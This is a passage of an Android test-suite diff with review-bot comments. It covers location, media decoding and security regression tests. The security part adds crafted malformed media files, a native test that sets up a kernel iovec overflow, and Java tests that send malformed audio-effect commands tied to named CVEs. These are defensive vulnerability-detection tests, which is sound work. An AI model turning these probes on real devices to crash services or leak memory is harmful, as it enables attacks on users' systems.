+ * Test case for bug 33091107, where a malicious app used to be able to fool a real provider
+ * into providing a mock location that isn't marked as being mock.
+ */
+ public void testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch()
+ throws InterruptedException {
+ double latitude = 20;
+ double longitude = 40;
+
+ List<String> providers = mManager.getAllProviders();
+ if (providers.isEmpty()) {
+ // Device doesn't have any providers. Can't perform this test, and no need to do so:
+ // no providers that malicious app could fool
+ return;
+ }
+ String realProviderToFool = providers.get(0);
+
+ // Register for location updates, then set a mock location and ensure it is marked "mock"
+ updateLocationAndWait(TEST_MOCK_PROVIDER_NAME, realProviderToFool, latitude, longitude);
+ }
+
@UiThreadTest
public void testGpsStatusListener() {
MockGpsStatusListener listener = new MockGpsStatusListener();
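Review bot: `providers.get(0)` in `testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch` may return `TEST_MOCK_PROVIDER_NAME` itself if the fixture has already registered the test provider (setUp is outside this hunk, so this is an assumption). In that case both names match and the mismatch behind bug 33091107 is never exercised, yet the test passes. Select the first entry for which `!TEST_MOCK_PROVIDER_NAME.equals(provider)` and return early only if none exists. The early return on an empty list also passes silently; a `Log.i` there would make the skip visible in results.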
@@ -1152,22 +1173,38 @@
private void updateLocationAndWait(String providerName, double latitude, double longitude)
throws InterruptedException {
+ updateLocationAndWait(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocationAndWait(String, double, double)}, but allows inconsistent providers
+ * to be used in the calls to {@link Location#Location(String)} and {@link
+ * LocationManager#setTestProviderLocation(String, Location)}
+ *
+ * @param testProviderName used in {@link LocationManager#setTestProviderLocation(String,
+ * Location)}
+ * @param locationProviderName used in {@link Location#Location(String)}
+ */
+ private void updateLocationAndWait(String testProviderName, String locationProviderName,
+ double latitude, double longitude) throws InterruptedException {
+
// Register a listener for the location we are about to set.
MockLocationListener listener = new MockLocationListener();
HandlerThread handlerThread = new HandlerThread("updateLocationAndWait");
handlerThread.start();
- mManager.requestLocationUpdates(providerName, 0, 0, listener, handlerThread.getLooper());
+ mManager.requestLocationUpdates(locationProviderName, 0, 0, listener,
+ handlerThread.getLooper());
// Set the location.
- updateLocation(providerName, latitude, longitude);
+ updateLocation(testProviderName, locationProviderName, latitude, longitude);
// Make sure we received the location, and it is the right one.
- assertTrue(listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
+ assertTrue("Listener not called", listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
Location location = listener.getLocation();
- assertEquals(providerName, location.getProvider());
- assertEquals(latitude, location.getLatitude());
- assertEquals(longitude, location.getLongitude());
- assertEquals(true, location.isFromMockProvider());
+ assertEquals("Bad provider name", locationProviderName, location.getProvider());
+ assertEquals("Bad latitude", latitude, location.getLatitude());
+ assertEquals("Bad longitude", longitude, location.getLongitude());
+ assertTrue("Bad isMock", location.isFromMockProvider());
// Remove the listener.
mManager.removeUpdates(listener);
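Review bot: The assertions in the four-argument `updateLocationAndWait` run before `mManager.removeUpdates(listener)`, so a failure (the expected outcome on a device without the fix) leaves the listener registered for the tests that follow. Wrapping the update and the assertions in `try { ... } finally { mManager.removeUpdates(listener); }` keeps one failing case from affecting others. The method body continues below the hunk, so the HandlerThread cleanup presumably needs the same treatment.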
@@ -1220,13 +1257,23 @@
private void updateLocation(final String providerName, final double latitude,
final double longitude) {
- Location location = new Location(providerName);
+ updateLocation(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocation(String, double, double)}, but allows inconsistent providers to be
+ * used in the calls to {@link Location#Location(String)} and
+ * {@link LocationManager#setTestProviderLocation(String, Location)}.
+ */
+ private void updateLocation(String testProviderName, String locationProviderName,
+ double latitude, double longitude) {
+ Location location = new Location(locationProviderName);
location.setLatitude(latitude);
location.setLongitude(longitude);
location.setAccuracy(1.0f);
- location.setTime(java.lang.System.currentTimeMillis());
+ location.setTime(System.currentTimeMillis());
location.setElapsedRealtimeNanos(SystemClock.elapsedRealtimeNanos());
- mManager.setTestProviderLocation(providerName, location);
+ mManager.setTestProviderLocation(testProviderName, location);
}
private void updateLocation(final double latitude, final double longitude) {
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index 9b1dc81..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,22 +19,11 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.rules.Timeout;
-import org.junit.runner.RunWith;
-import org.junit.Test;
-
@TargetApi(24)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTest extends DecodeAccuracyTestBase {
private static final String TAG = DecodeAccuracyTest.class.getSimpleName();
@@ -43,17 +32,12 @@
private static final String H264_CROPPED_VIDEO_FILE_NAME = "520x360h264decodertest.mp4";
private static final int ALLOWED_GREATEST_PIXEL_DIFFERENCE = 90;
private static final int OFFSET = 10;
- private static final int PER_TEST_TIMEOUT_S = 30;
private View videoView;
private VideoViewFactory videoViewFactory;
- @Rule
- public Timeout globalTimeout = Timeout.seconds(PER_TEST_TIMEOUT_S);
-
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
if (videoView != null) {
getHelper().cleanUpView(videoView);
}
@@ -64,42 +48,36 @@
}
/* <------------- Tests Using H264 -------------> */
- @Test
public void testH264GLViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264GLViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264GLViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -107,42 +85,36 @@
}
/* <------------- Tests Using VP9 -------------> */
- @Test
public void testVP9GLViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9GLViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9GLViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9SurfaceViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -150,14 +122,12 @@
}
/* <------------- Tests H264 with cropping -------------> */
- @Test
public void testH264GLViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_CROPPED_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new SurfaceViewFactory(),
@@ -166,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
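Review bot: `runH264DecodeAccuracyTest`, `runVP9DecodeAccuracyTest` and `runH264DecodeCroppedTest` now call `runDecodeAccuracyTest` unconditionally, so on a device without the AVC or VP9 decoder these cases would presumably fail rather than be skipped as the removed `MediaUtils.checkDecoder(...)` guard arranged. If the guard is dropped only because `android.cts.util.MediaUtils` is no longer imported on this branch, an equivalent availability check should remain. Otherwise a one-line comment on each helper stating that the decoder is mandatory here would record the intent.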
@@ -227,8 +191,7 @@
private void validateResult(
VideoFormat videoFormat, VideoViewSnapshot videoViewSnapshot, int goldenResId) {
- final Bitmap result = checkNotNull("The expected bitmap from snapshot is null",
- getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot));
+ final Bitmap result = getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot);
final Bitmap golden = getHelper().generateBitmapFromImageResourceId(goldenResId);
final BitmapCompare.Difference difference = BitmapCompare.computeMinimumDifference(
result, golden, videoFormat.getOriginalWidth(), videoFormat.getOriginalHeight());
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
index 1ce732d..fae1bb4 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
@@ -44,8 +44,6 @@
import android.os.HandlerThread;
import android.os.Looper;
import android.os.SystemClock;
-import android.support.test.InstrumentationRegistry;
-import android.support.test.runner.AndroidJUnit4;
import android.test.ActivityInstrumentationTestCase2;
import android.util.Log;
import android.util.Pair;
@@ -75,12 +73,7 @@
import javax.microedition.khronos.egl.EGLDisplay;
import javax.microedition.khronos.egl.EGLSurface;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.runner.RunWith;
-
@TargetApi(16)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTestBase
extends ActivityInstrumentationTestCase2<DecodeAccuracyTestActivity> {
@@ -93,12 +86,9 @@
super(DecodeAccuracyTestActivity.class);
}
- @Before
@Override
- public void setUp() throws Exception {
+ protected void setUp() throws Exception {
super.setUp();
- injectInstrumentation(InstrumentationRegistry.getInstrumentation());
- setActivityInitialTouchMode(false);
mActivity = getActivity();
getInstrumentation().waitForIdleSync();
mContext = getInstrumentation().getTargetContext();
@@ -106,9 +96,8 @@
testHelper = new TestHelper(mContext, mActivity);
}
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
mActivity = null;
super.tearDown();
}
@@ -128,11 +117,6 @@
return reference;
}
- public static <T> T checkNotNull(String msg, T reference) {
- assertNotNull(msg, reference);
- return reference;
- }
-
public static class SimplePlayer {
public static final long DECODE_TIMEOUT_MS = TimeUnit.SECONDS.toMillis(1) / 2;
@@ -435,8 +419,6 @@
/* Utility class for collecting common test case functionality. */
class TestHelper {
- private final String TAG = TestHelper.class.getSimpleName();
-
private final Context context;
private final Handler handler;
private final Activity activity;
@@ -491,21 +473,13 @@
}
public synchronized Bitmap generateBitmapFromVideoViewSnapshot(VideoViewSnapshot snapshot) {
- final long timeOutMs = TimeUnit.SECONDS.toMillis(10);
- final long start = SystemClock.elapsedRealtime();
handler.post(snapshot);
try {
- while (!snapshot.isBitmapReady()
- && (SystemClock.elapsedRealtime() - start < timeOutMs)) {
+ while (!snapshot.isBitmapReady()) {
Thread.sleep(100);
}
} catch (InterruptedException e) {
e.printStackTrace();
- return null;
- }
- if (!snapshot.isBitmapReady()) {
- Log.e(TAG, "Time out in generateBitmapFromVideoViewSnapshot().");
- return null;
}
return snapshot.getBitmap();
}
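Review bot: The polling loop in `generateBitmapFromVideoViewSnapshot` is now unbounded: if the snapshot never reports `isBitmapReady()`, this `synchronized` method sleeps forever, and the same change removes the per-test `Timeout` rule from DecodeAccuracyTest, so the run would hang instead of failing. Keep a deadline, e.g. `final long deadline = SystemClock.elapsedRealtime() + TimeUnit.SECONDS.toMillis(10);` with `while (!snapshot.isBitmapReady() && SystemClock.elapsedRealtime() < deadline)`, and fail explicitly when it expires. The `catch (InterruptedException e)` block should also call `Thread.currentThread().interrupt();` instead of only printing the stack trace, since the method then returns whatever `getBitmap()` currently holds.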
@@ -1191,7 +1165,8 @@
class SurfaceViewSnapshot extends VideoViewSnapshot {
private static final String TAG = SurfaceViewSnapshot.class.getSimpleName();
- private static final int PIXELCOPY_REQUEST_SLEEP_MS = 100;
+ private static final int PIXELCOPY_REQUEST_SLEEP_MS = 30;
+ private static final int PIXELCOPY_REQUEST_MAX_ATTEMPTS = 20;
private static final int PIXELCOPY_TIMEOUT_MS = 1000;
private final Thread copyThread;
@@ -1207,13 +1182,15 @@
bitmap = Bitmap.createBitmap(width, height, Config.ARGB_8888);
try {
// Wait for SurfaceView to be available.
- while (copyResult != PixelCopy.SUCCESS) {
- Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
+ for (int i = 0; i < PIXELCOPY_REQUEST_MAX_ATTEMPTS; i++) {
copyResult = copyHelper.request(surfaceView, bitmap);
+ if (copyResult == PixelCopy.SUCCESS) {
+ break;
+ }
+ Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
}
} catch (InterruptedException e) {
- Log.e(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
- bitmap = null;
+ Log.w(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
}
copyHelper.release();
}
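Review bot: When all `PIXELCOPY_REQUEST_MAX_ATTEMPTS` requests fail, the loop exits with `copyResult` still not `PixelCopy.SUCCESS` and nothing is logged, so the newly created empty `bitmap` is presumably what the comparison sees and the test fails with a pixel-difference message that hides the real cause. After the loop add `if (copyResult != PixelCopy.SUCCESS) { Log.e(TAG, "PixelCopy failed after " + PIXELCOPY_REQUEST_MAX_ATTEMPTS + " attempts: " + copyResult); }`. The enclosing method starts and ends outside the hunk.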
@@ -1317,10 +1294,10 @@
try {
waitForByteBuffer();
} catch (InterruptedException e) {
- Log.e(TAG, e.getMessage());
- bitmap = null;
- return;
+ Log.w(TAG, e.getMessage());
+ Log.w(TAG, "ByteBuffer may contain incorrect pixels.");
}
+ // Get ByteBuffer anyway. Let the test fail if ByteBuffer contains incorrect pixels.
ByteBuffer byteBuffer = glSurfaceViewFactory.getByteBuffer();
bitmap = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);
byteBuffer.rewind();
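Review bot: `Log.w(TAG, e.getMessage())` drops the stack trace, and `getMessage()` may be null for an `InterruptedException`; a single call that passes the throwable, `Log.w(TAG, "Interrupted waiting for ByteBuffer; it may contain incorrect pixels.", e);`, replaces both added log lines. The interrupt status is not restored before the code carries on, so `Thread.currentThread().interrupt();` in the catch block would let the caller observe it. The enclosing method starts outside the hunk.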
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 32d9eaa..dffb653 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,17 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone()) {
+ return; // skip
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index a857670..c5baeed 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
private static final int SECURITY_PATCH_YEAR = 2017;
- private static final int SECURITY_PATCH_MONTH = 01;
+ private static final int SECURITY_PATCH_MONTH = 05;
private boolean mSkipTests = false;
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 7468d68..7b87851 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -25,6 +25,7 @@
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
<application>
<uses-library android:name="android.test.runner" />
diff --git a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
index 25dcc9b..12c3517 100644
--- a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
+++ b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
@@ -303,14 +303,18 @@
* set up to overflow iov[OVERFLOW_BUF] on non-atomic redo in kernel
* function pipe_iov_copy_to_user
*/
- bufs[OVERFLOW_BUF] = mmap((void*)(FIXED_ADDR), PAGE_SIZE, PROT_READ | PROT_WRITE,
- MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ iovs[OVERFLOW_BUF - 1].iov_len = IOV_LEN*10;
+ iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
+ iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
+
+ overflow_addr = mmap((void *) FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+ bufs[OVERFLOW_BUF] = overflow_addr;
if (bufs[OVERFLOW_BUF] == MAP_FAILED) {
ALOGE("mmap fixed addr failed:%s", strerror(errno));
goto __close_pipe;
}
- iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
- iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
for (i = 0; i < BUFS; i++) {
if (i == OVERFLOW_BUF) {
diff --git a/tests/tests/security/res/raw/bug_33137046.mp4 b/tests/tests/security/res/raw/bug_33137046.mp4
new file mode 100644
index 0000000..01f49b2
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33137046.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33300701.tiff b/tests/tests/security/res/raw/bug_33300701.tiff
new file mode 100644
index 0000000..ea7a477
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33300701.tiff
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35467107.mp4 b/tests/tests/security/res/raw/bug_35467107.mp4
new file mode 100644
index 0000000..43ccef6
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35467107.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35763994.amr b/tests/tests/security/res/raw/bug_35763994.amr
new file mode 100644
index 0000000..b6d3f0e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35763994.amr
@@ -0,0 +1 @@
+#!AMR-WB
diff --git a/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4 b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
new file mode 100644
index 0000000..6d41ebc
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3755.mp4 b/tests/tests/security/res/raw/cve_2016_3755.mp4
new file mode 100644
index 0000000..014bd06
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3755.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4 b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
new file mode 100644
index 0000000..469a1b3
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
new file mode 100644
index 0000000..0d453da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -0,0 +1,409 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import android.cts.util.CtsAndroidTestCase;
+import android.media.AudioFormat;
+import android.media.AudioManager;
+import android.media.AudioTrack;
+import android.media.audiofx.AudioEffect;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.Arrays;
+import java.util.UUID;
+
+public class AudioSecurityTest extends CtsAndroidTestCase {
+ private static final String TAG = "AudioSecurityTest";
+
+ private static final int ERROR_DEAD_OBJECT = -7; // AudioEffect.ERROR_DEAD_OBJECT
+
+ // should match audio_effect.h (native)
+ private static final int EFFECT_CMD_SET_PARAM = 5;
+ private static final int EFFECT_CMD_GET_PARAM = 8;
+ private static final int EFFECT_CMD_OFFLOAD = 20;
+ private static final int SIZEOF_EFFECT_PARAM_T = 12;
+
+ private static void verifyZeroReply(byte[] reply) throws Exception {
+ int count = 0;
+ for (byte b : reply) {
+ if (b != 0) {
+ count++;
+ }
+ }
+ assertEquals("reply has " + count + " nonzero values", 0 /* expected */, count);
+ }
+
+ // @FunctionalInterface
+ private interface TestEffect {
+ void test(AudioEffect audioEffect) throws Exception;
+ }
+
+ private static void testAllEffects(String testName, TestEffect testEffect) throws Exception {
+ int failures = 0;
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ final AudioEffect audioEffect;
+ try {
+ audioEffect = (AudioEffect)AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type,
+ descriptor.uuid, // uuid overrides type
+ 0 /* priority */, 0 /* audioSession */);
+ } catch (Exception e) {
+ Log.w(TAG, "effect " + testName + " " + descriptor.name
+ + " cannot be created (ignoring)");
+ continue; // OK;
+ }
+ try {
+ testEffect.test(audioEffect);
+ Log.d(TAG, "effect " + testName + " " + descriptor.name + " success");
+ } catch (Exception e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ } catch (AssertionError e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ }
+ }
+ assertEquals("found " + testName + " " + failures + " failures",
+ 0 /* expected */, failures);
+ }
+
+ // b/28173666
+ public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
+ testAllEffects("get parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/32438594
+ // b/32624850
+ // b/32635664
+ public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
+ testAllEffects("get parameter2 attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter2(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/30204301
+ public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
+ testAllEffects("set parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectSetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ private static void testAudioEffectGetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with invalid psize
+ {
+ byte command[] = new byte[30];
+ Arrays.fill(command, (byte)0xDD);
+ byte reply[] = new byte[30];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ verifyZeroReply(reply);
+ }
+
+ // NOTE: an alternative way of checking crash:
+ //
+ // Thread.sleep(1000 /* millis */);
+ // assertTrue("Audio server might have crashed",
+ // audioEffect.setEnabled(false) != AudioEffect.ERROR_DEAD_OBJECT);
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter2(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with small command size but large psize
+ {
+ final int parameterSize = 0x100000;
+
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(parameterSize) // psize (very large)
+ .putInt(0) // vsize
+ .putInt(0x04030201) // data[0] (param too small for psize)
+ .putInt(0x08070605) // data[4]
+ .array();
+ byte reply[] = new byte[parameterSize + SIZEOF_EFFECT_PARAM_T];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ verifyZeroReply(reply);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter3(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) get parameter with zero command size
+ {
+ final int parameterSize = 0x10;
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_GET_PARAM,
+ new byte[0] /* command */,
